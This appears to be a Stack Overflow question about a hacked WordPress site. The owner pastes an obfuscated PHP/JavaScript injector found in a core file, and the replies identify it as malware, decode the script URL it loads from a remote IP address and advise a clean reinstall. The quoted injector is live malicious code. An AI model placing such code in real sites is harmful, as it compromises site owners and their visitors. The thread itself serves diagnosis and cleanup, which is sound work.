# edit wp-admin in wordpress

Tags: php, wordpress

My question is about 
i can't access to my WordPress /wp-admin
i get this error

> Parse error: syntax error in file.php" line 1941

i enter to this file and found this command:

```
fwrite( $file, "<script type="text/javascript">var _0x2515=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0x2515[5]](_0x2515[4][_0x2515[3]](_0x2515[0])[_0x2515[2]]()[_0x2515[1]](_0x2515[0]));</script></head>\n" );
```

i can't find the problem where is located so i can enter to my dashboard wordpress.

Comment: Looks dodgy as that... maybe malicious... :/

Comment: Remove the line completely. It looks a malware to me too!

Comment: I'd reinstall WordPress... backup etc. but if your DB is up to date, download a new version of WP, and replace wp-admin and wp-includes with the new downloads versions.  Should fix this issue as the file will be removed and only the actual WP files will remain, it'll also fix any other potential malfiles, but worth having a proper malscan of your site etc. as could be more issues.

Comment: what you found is a script that injects `<script src="http://134.249.116.78/jquery.js"></script>` into your administration UI. That IP address is registered to somewhere in the Ukraine. the other comments nailed it. your machine has been compromised and reinstallation of the entire setup is recommended.

Comment: Read [How do I deal with a compromised server?](https://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server)

Comment: Also see: [FAQ My site was hacked « WordPress Codex](https://codex.wordpress.org/FAQ_My_site_was_hacked)

Answer (score 0):

The best way is reinstalled a newly updated Version of Wordpress. Download the 4.9.8 version of Wordpress, and then unzipped/extract files on it. After that you've finished extracting the files, copy (Ctrl + C) the wp-admin folder and paste or replace your older wp-admin.

Comment: Thanks so much Ever Dev, it works well ;)